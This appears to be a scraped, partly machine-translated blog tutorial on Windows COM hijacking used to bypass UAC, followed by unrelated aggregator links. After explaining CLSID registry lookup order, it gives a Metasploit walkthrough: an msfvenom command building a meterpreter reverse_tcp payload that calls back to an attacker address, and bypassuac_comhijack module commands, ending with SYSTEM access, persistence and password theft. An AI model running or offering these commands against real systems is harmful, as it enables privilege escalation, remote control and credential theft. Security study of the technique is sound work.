COM hijacks BypassUAC

Others 2021-03-31 16:26:22 views: null

What is com
com is the abbreviation of Component Object Model (Component Object Model)
come is a new software development technology developed by Microsoft in the future of software production in the computer industry that is more in line with human behavior. Under the com architecture, people can develop a variety of function-specific components,
and then combine them to form a complex application system.
Insert picture description here

I have to talk about CLSID
CLSID (Class Identifier) ​​globally unique identifier. CLSID refers to a unique ID code assigned by the windows system to different applications, file types, OLE objects, special folders, and various system components. ,
Used to distinguish its identity from other objects.
The process of com component loading

1:HKCU\Software\Classes\CLSID
2:HKCR\CLSID
3:HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\shellCompatibility\Objects\

只要是调用windowAPI的,在底层上都会调用com组件,window由很多组件组成的,并不是api组成的,api也会调用一些组件,这些组件就是com组件

The principle of com component hijacking

当进程寻找com组件时,首先会寻找:
HKCU\Software\Classes\CLSID
我们直接在CLSID下面新建一个对象ID,就能够劫持某个进程或多个进程
与dll劫持原理相近,但是com组件的劫持可以拓展很多东西,劫持的目标不一定是一个进程,劫持所需的文件不一定是一个dll,
他可以是一个 .com文件、二进制PE文件、Dll文件、劫持的目标也可以是一个Window API

msf BypassUAC case

首先生成shellcode,放入win7中执行
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.17.177 LPORT=4444 -f exe > payload.exe

Insert picture description here
After getting the listener, here we see that getsystem fails. At this time, we use com to hijack bypassUAC

使用bypassuac_comhijack 利用代码,设置监听,但是这里只适用于64位系统
use exploit/windows/local/bypassuac_comhijack 
set payload windows/x64/meterpreter/reverse_tcp

Insert picture description here
After setting up successfully, we run

Insert picture description here

run后,他会修改那个注册表,图中{
    
    }的部分
然后把这个注册表修改成什么值,图中为我们生成的dll文件,并且上传到目标机器
最后成功获得system
之后就可以提权,维持,抓密码等操作

The principle is that the com component hijacks the event queryer eventvwr.exe or console mmc.exe and replaces their CLSID with the one we generated, which means that when the event queryer (hijacked program) is opened, one of the CLSID components will be automatically called A registry key, and then the dll in the registry key will be loaded into the memory space of the event viewer. After executing the shellcode in the dll, it will bounce back to the session

Guess you like

Origin blog.csdn.net/weixin_45682070/article/details/109911748
Recommended
Ranking
[Nodejs] Native nodejs routing, getting parameters, static directory
Introduction and use of the datetime module in python - used to process date and time, calculate time intervals, etc.
Java bytecode decompiler in IntelliJIDEA for Scala
Resolved local variable 'str' referenced before assignment
Transformer Vision (2) || ViT-B/16 network structure
Translation: The most impressive YouTube channel that allows you to learn AI, machine learning and data science
gRPC- interceptor simple to use
Fortunately, three times faster investment has been lost how to do? There Baoying tutor you fly 69,937,609
Using Django to create a new project in the Windows10 environment gives an error [django-admin.py: The "django-admin.py" item cannot be recognized as the name of a cmdlet, function, script file, or executable program. 】
What should I do if I need to prepare the product standard
Daily
More
2024-06-05(0)
2024-06-04(0)
2024-06-03(1)
2024-06-02(0)
2024-06-01(1)
2024-05-31(1)
2024-05-30(0)
2024-05-29(1)
2024-05-28(1)
2024-05-27(1)

Code World

© 2018 codetd.com